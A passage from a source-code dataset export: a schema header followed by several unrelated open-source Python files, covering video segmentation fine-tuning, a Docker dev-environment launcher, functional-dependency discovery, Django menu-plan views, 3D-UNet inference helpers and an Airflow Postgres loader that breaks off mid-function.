hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f79434b07d0fd0852489b19f8f438fa54ae857d | 7,273 | py | Python | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 2 | 2021-09-26T07:03:54.000Z | 2022-02-21T15:46:30.000Z | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | null | null | null | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 1 | 2021-04-16T06:11:41.000Z | 2021-04-16T06:11:41.000Z | """
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubblNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
# when two bubblenet models select the different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
def train_test(video_path_names):
start_time = time.time()
for sequence_name in video_path_names:
seq_name = "{}".format(sequence_name)
gpu_id = 0
# Train and test parameters
# training and testing or testing only
train_model = True
objectness_steps = 45000
# The path to obtain weights from objectness training
objectness_path = os.path.join('weights', 'objectness_weights', 'objectness_weights.ckpt-{}'.format(objectness_steps))
# The path to save weights of fine tuning
logs_path_base = os.path.join('weights', 'fine_tune_weights')
create_non_exist_file(logs_path_base)
logs_path = os.path.join(logs_path_base, seq_name)
logger = create_logger(logs_path_base)
logger.info('The random seed is {}'.format(seed))
max_training_iters = 200
# use GFS
use_GFS = True
# test data augmentation
test_aug = True
# train data augmentation
data_aug = True
logger.info('Data augmentation is {}'.format(data_aug))
logger.info('Test augmentation is {}'.format(test_aug))
logger.info('Use GFS is {}'.format(use_GFS))
# Define Dataset
# the video for tesing
test_frames = sorted(
os.listdir(os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name)))
test_imgs = [os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name, frame) for frame
in test_frames]
# result paths
create_non_exist_file('results')
result_path_base = os.path.join('results', 'segmentation')
create_non_exist_file(result_path_base)
result_path = os.path.join(result_path_base, seq_name)
create_non_exist_file(result_path)
if train_model:
if use_GFS:
# BubbleNet selection: one optimal frame
frame_random_jpg, frame_random_png = select_optimal_frame(seq_name)
selected_image = os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name,
frame_random_jpg)
selected_mask = os.path.join('datasets', 'finetune_test_dataset', 'Annotations', '480p', seq_name,
frame_random_png)
train_imgs = [selected_image + ' ' + selected_mask]
logger.info('select frame {} in folder {}'.format(frame_random_jpg, seq_name))
else:
# Train on the first frame
logger.info('train on first frame')
train_imgs = [os.path.join('datasets', 'finetune_test_dataset',
'JPEGImages', '480p', seq_name, '00000.jpg') + ' ' + os.path.join('datasets', 'finetune_test_dataset',
'Annotations', '480p', seq_name, '00000.png')]
dataset = Dataset(train_imgs, test_imgs, './', data_aug=data_aug, test_aug=test_aug)
# testing only
else:
# test augmentation is on
dataset = Dataset(None, test_imgs, './', test_aug=test_aug)
# Train the network
if train_model:
# More training parameters
learning_rate = 1e-7
save_step = max_training_iters
# no side supervision
side_supervision = 3
logger.info('The supervision mode is {}'.format(side_supervision))
display_step = 10
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# global_step is related to the name of cpkt file
global_step = tf.Variable(0, name='global_step', trainable=False)
models.train_finetune(dataset, objectness_path, side_supervision, learning_rate, logs_path,
max_training_iters, save_step, display_step, global_step, logger, finetune=2,
iter_mean_grad=1, ckpt_name=seq_name, dropout_rate=1.0)
# Test the network
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# No fine-tuning
checkpoint_path = os.path.join('weights/fine_tune_weights/', seq_name,
seq_name + '.ckpt-' + str(max_training_iters))
# generate results images(binary) to the results path
models.test(dataset, checkpoint_path, result_path)
end_time = time.time()
running_time = round(end_time - start_time, 3)
FPS = running_time/493.0
logger.info('The testing time is {}s'.format(running_time))
logger.info('The FPS is {}'.format(FPS))
if __name__ == '__main__':
train_test(sequence_names)
| 41.56 | 126 | 0.639214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,281 | 0.313626 |
5f79476b04b3854cb2181098acbee05c751aa836 | 307 | py | Python | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 2 | 2021-11-13T12:23:41.000Z | 2021-12-24T14:09:49.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2022-03-29T19:13:24.000Z | 2022-03-30T18:57:23.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2021-11-13T12:30:01.000Z | 2021-11-13T12:30:01.000Z | from dataclasses import field, dataclass
from typing import List
from kinopoisk_unofficial.contract.response import Response
from kinopoisk_unofficial.model.season import Season
@dataclass(frozen=True)
class SeasonsResponse(Response):
total: int
items: List[Season] = field(default_factory=list)
| 25.583333 | 59 | 0.814332 | 101 | 0.32899 | 0 | 0 | 125 | 0.407166 | 0 | 0 | 0 | 0 |
5f7a417145bc1e9d7aeea4542c8fef811419cb42 | 4,906 | py | Python | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
def codepod(*,repository='',image=None,volumes=[],mount_tmp=True,host_working_directory=None,docker_opts=None,git_smart=False,no_pull=False,command=False):
if not docker_opts:
docker_opts=''
if docker_opts.startswith('"'):
docker_opts=docker_opts[1:-1]
if host_working_directory is None:
if not repository:
raise Exception('You must either specify a repository or a host working directory.')
host_working_directory=_get_random_directory()
host_working_directory=os.path.abspath(host_working_directory)
if repository:
if os.path.exists(host_working_directory):
raise Exception('Host working directory already exists: '+host_working_directory)
_git_clone_into_directory(repository,host_working_directory)
config={}
if os.path.exists(host_working_directory+'/.codepod.yml'):
print(host_working_directory+'/.codepod.yml')
config=_parse_yaml(host_working_directory+'/.codepod.yml')
print(':::::::::::::::::::::::config:',config)
if image is None:
if 'image' in config:
image=config['image']
if image is None:
image='magland/codepod:latest'
print('Using image: '+image)
opts=[
'-it',
'--mount type=bind,source={src_dir}/codepod_init_in_container.py,destination=/codepod_init,readonly',
'--mount type=bind,source={host_working_directory},destination=/home/project',
'--network host',
'--privileged',
'-e DISPLAY=unix{}'.format(os.environ.get('DISPLAY','')),
'--mount type=bind,source=/tmp/.X11-unix,destination=/tmp/.X11-unix'
]
if command is not None:
del opts[0]
config['tasks'].append({'command':command})
# git configuration
#if [ -f "$HOME/.gitconfig" ]; then
# OPTS="$OPTS -v $HOME/.gitconfig:/home/theiapod/.gitconfig"
#fi
#if [ -d "$HOME/.git-credential-cache" ]; then
# OPTS="$OPTS -v $HOME/.git-credential-cache:/home/theiapod/.git-credential-cache"
#fi
path0=os.environ.get('HOME','')+'/.gitconfig'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.gitconfig'))
path0=os.environ.get('HOME','')+'/.git-credential-cache'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.git-credential-cache'))
if mount_tmp:
opts.append('--mount type=bind,source=/tmp,destination=/tmp')
for vv in volumes:
if type(vv)==tuple:
opts.append('--mount type=bind,source={},destination={}'.format(os.path.abspath(vv[0]),os.path.abspath(vv[1])))
else:
raise Exception('volumes must be tuples.')
if no_pull:
print('Not pulling docker image because no_pull was specified')
else:
try:
_run_command_and_print_output('docker pull {image}'.format(image=image))
except:
print('WARNING: failed to pull docker image: {image}... proceeding without pulling...'.format(image=image))
cmd='docker run {opts} {docker_opts} {image} /home/project {user} {uid}'
#cmd='docker run {opts} {image}'
cmd=cmd.replace('{opts}',' '.join(opts))
cmd=cmd.replace('{docker_opts}',docker_opts)
cmd=cmd.replace('{src_dir}',src_dir)
cmd=cmd.replace('{image}',image)
# cmd=cmd.replace('{repository}',repository)
cmd=cmd.replace('{host_working_directory}',host_working_directory)
cmd=cmd.replace('{user}',os.environ['USER'])
cmd=cmd.replace('{uid}',str(os.getuid()))
print('RUNNING: '+cmd)
os.system(cmd)
#_run_command_and_print_output(cmd)
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
def _parse_yaml(fname):
try:
with open(fname) as f:
obj=yaml.load(f)
return obj
except:
return None
def _get_random_directory():
return tempfile.gettempdir()+'/codepod_workspace_'+_get_random_string(10)
def _get_random_string(N):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
def _git_clone_into_directory(repo,path):
cmd='git clone {} {}'.format(repo,path)
_run_command_and_print_output(cmd)
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
#yield stdout_line
print(stdout_line,end='\r')
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
def _run_command_and_print_output(cmd):
print('RUNNING: '+cmd);
execute(cmd.split())
| 35.294964 | 155 | 0.664492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,758 | 0.358337 |
5f7b66cd930462b5d1756ba227c23eb8265b8002 | 5,040 | py | Python | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 388 | 2018-09-13T20:48:58.000Z | 2020-11-23T11:52:13.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 597 | 2018-10-08T12:45:29.000Z | 2020-11-24T17:53:12.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 228 | 2018-11-06T02:04:14.000Z | 2020-12-09T07:51:02.000Z | #! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
timeit(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
def get_slice_for_sliding_window(image, roi_shape=ROI_SHAPE, overlap=SLIDE_OVERLAP_FACTOR):
"""
Returns indices for image stride, to fulfill sliding window inference
Stride is determined by roi_shape and overlap
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
assert isinstance(overlap, float) and overlap > 0 and overlap < 1,\
f"Need sliding window overlap factor in (0,1): {overlap}"
image_shape = list(image.shape[2:])
dim = len(image_shape)
strides = [int(roi_shape[i] * (1 - overlap)) for i in range(dim)]
size = [(image_shape[i] - roi_shape[i]) //
strides[i] + 1 for i in range(dim)]
for i in range(0, strides[0] * size[0], strides[0]):
for j in range(0, strides[1] * size[1], strides[1]):
for k in range(0, strides[2] * size[2], strides[2]):
yield i, j, k
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
def get_latency(*args, **kw):
ts = time.time()
result, mystr = function(*args, **kw)
te = time.time()
print('{:86} took {:>10.5f} sec'.format(mystr, te - ts))
return result, ""
return get_latency
| 32.101911 | 91 | 0.698611 | 0 | 0 | 947 | 0.187897 | 0 | 0 | 0 | 0 | 2,789 | 0.553373 |
5f7d2edfb9acb222096440265492c363f375f8a6 | 3,047 | py | Python | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 13 | 2019-03-22T13:30:04.000Z | 2022-02-01T04:46:44.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 3 | 2020-07-01T11:17:40.000Z | 2022-02-13T11:20:34.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 11 | 2018-07-02T23:46:31.000Z | 2021-12-14T12:29:38.000Z | import binaryRepr
# Create decorator function to see how many times functions are called
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs);
helper.calls = 0
helper.__name__= func.__name__
return helper;
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
@call_counter
def CardOfPartition(Candidate, df):
# If length is one, find number of unique elements in column
if len(Candidate) == 1: return df[Candidate[0]].nunique()
# If length is +1, create groups over which to find number of unique elements
else: return df.drop_duplicates(Candidate).count()[0];
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;
| 43.528571 | 187 | 0.637348 | 0 | 0 | 0 | 0 | 318 | 0.104365 | 0 | 0 | 1,646 | 0.540203 |
5f7e6f4612c23637da085f15ec80d97da8c65063 | 1,712 | py | Python | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | 1 | 2021-01-16T15:42:01.000Z | 2021-01-16T15:42:01.000Z | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
def __init__(self):
super().__init__('activity',
(('--sequence_length', 64, int),
('--max_samples', 40_000, int),
('--sample_distance', 4, int),
('--loss_name', 'SparseCategoricalCrossentropy', str),
('--loss_config', {'from_logits': True}, dict),
('--metric_name', 'SparseCategoricalAccuracy', str)))
def get_data_and_output_size(self):
sequence_length = self.args.sequence_length
max_samples = self.args.max_samples
sample_distance = self.args.sample_distance
activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
sensor_inputs = []
time_inputs = []
activity_outputs = []
for activity_marker in activity_table[0].unique():
activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
sensor_inputs.append(current_sequence[:, 1:8])
time_inputs.append(current_sequence[:, :1])
activity_outputs.append(current_sequence[-1, 8:])
return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7
ActivityBenchmark()
| 45.052632 | 139 | 0.624416 | 1,583 | 0.92465 | 0 | 0 | 0 | 0 | 0 | 0 | 191 | 0.111565 |
5f8081343c9866235ed311ae6467c672bfbe7609 | 4,685 | py | Python | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
def index(request):
search_query = None
if request.method == 'POST':
search_form = MenuplanSearchForm(request.POST)
else:
search_form = MenuplanSearchForm()
table_data = []
menuplans = get_menuplans(search_form.data.get('query'))
if menuplans:
document = untangle.parse(menuplans)
if int(document.menuplans['total']) > 0:
for menuplan in document.menuplans.get_elements():
name = menuplan.name.cdata
cd = parser.parse(menuplan.creationDate.cdata)
cd = cd.strftime('%d.%m.%Y %H:%M')
try:
nd = parser.parse(menuplan.name.cdata)
name = nd.strftime('%d.%m.%Y %H:%M')
except:
pass
table_data.append({
'name': name,
'creationDate': cd,
'people': menuplan.people.cdata,
'pk': menuplan.pk.cdata
})
return render(request, 'menuplans/index.html',
{'table': MenuplanTable(table_data),
'search_form': search_form})
def create(request):
if request.method == 'POST':
form = MenuplanCreateForm(request.POST)
if form.is_valid():
data = form.cleaned_data
pk, document = create_menuplan(data['people'], data['menus'])
add_menuplan(pk, et.tostring(document))
return redirect('menuplans.detail', pk=pk)
else:
form = MenuplanCreateForm()
return render(request, 'menuplans/create.html', {'form': form})
def join_non_empty(vals, sep=' '):
return sep.join([x for x in vals if x and x.strip()])
def detail(request, pk):
if request.method == 'GET':
val = get_menuplan_display(pk)
print(val)
display = et.fromstring(val)
menuplan = []
shopping_list = []
recipes = []
for shopping_list_item in display.findall('.//shoppingListItem'):
unit = shopping_list_item.findtext('unit', '')
name = shopping_list_item.findtext('name')
amount = float(shopping_list_item.findtext('amount'))
if not amount:
amount = ''
alpha_values = shopping_list_item.findall('alphaAmounts/value')
if amount or not alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([str(amount), unit])
})
for alpha_value in alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([alpha_value.text, unit])
})
for e_plan in display.findall('days//day'):
menuplan.append({
'day': e_plan.findtext('number'),
'recipe': e_plan.findtext('recipe')
})
for e_recipe in display.findall('recipes//recipe'):
e_ings = e_recipe.findall('.//ingredient')
ingredients = []
for e_ing in e_ings:
ing_name = e_ing.findtext('name')
ing_unit = e_ing.findtext('.//unit', '')
ing_value = e_ing.findtext('.//value', '')
ing_comment = e_ing.findtext('.//comment', '')
ingredients.append(
join_non_empty([ing_value, ing_unit, ing_name, ing_comment]))
ingredients = join_non_empty(ingredients, ', ')
instructions = []
einstructions = e_recipe.findall('.//instruction/text')
for einst in einstructions:
instructions.append(einst.text)
recipes.append({
'name': e_recipe.findtext('name'),
'ingredients': ingredients,
'instructions': instructions
})
print(recipes)
return render(request,
'menuplans/detail.html',
{
'recipes': recipes,
'menuplan': menuplan,
'shopping_list': shopping_list,
})
| 30.225806 | 81 | 0.547492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 531 | 0.11334 |
5f809ea0bdda1d52d937bea676c3f2375a0406e8 | 6,448 | py | Python | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 5 | 2021-12-01T09:55:23.000Z | 2021-12-21T16:23:33.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 1 | 2022-03-14T16:50:41.000Z | 2022-03-14T16:50:41.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 2 | 2021-11-03T09:43:09.000Z | 2021-11-17T10:16:29.000Z | from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
class PgSCD1DFUpdateInsert(PgLoader):
"""Update the target table by SCD 1 by diff_change_operation
:param source: Source
:param conn_id: Connection id
:param table_name: Table name for update
:param key: The key by which update. Avoid NULL for the key.
:param diff_change_oper: Field with the flag of the operation to be applied to the record D,U,I
:param chunk_row_number: The number of rows in the chunk to load into the database and apply to the table
"""
ui_color = '#DDF4ED'
def __init__(
self,
source: list,
conn_id: str,
table_name: str,
key: list[str],
diff_change_oper: str,
chunk_row_number: int,
**kwargs
):
super().__init__(**kwargs)
self.conn_id = conn_id
self.table_name = table_name
self.key = key
self.diff_change_oper = diff_change_oper
self.chunk_row_number = chunk_row_number or MAX_INSERT_ROWS_NUMBER
self.source = source[0]
self.source_task = self.dag.task_dict[self.source]
self.source_task >> self # pylint: disable=pointless-statement
def execute(self, context):
hook = PostgresHook(postgres_conn_id=self.conn_id)
work = self.dag.get_work(work_type=WorkType.WORK_PG.value, work_conn_id=self.conn_id)
work.create(context)
source_df = self.source_task.result.read(context)
df_rows = len(source_df.index)
if not df_rows:
self.log.info('Source dataset is empty. Finishing task.')
return
if self.chunk_row_number and self.chunk_row_number < 1:
raise RuntimeError('chunk_row_number must be positive integer or None '
f'Current value is "{self.chunk_row_number}".'
)
chunk_number = self._get_chunk_number(data_row_number=df_rows, chunk_row=self.chunk_row_number)
self.log.info(f'Will process {df_rows} rows in {chunk_number} chunks.')
source_split = numpy.array_split(source_df, chunk_number)
del source_df
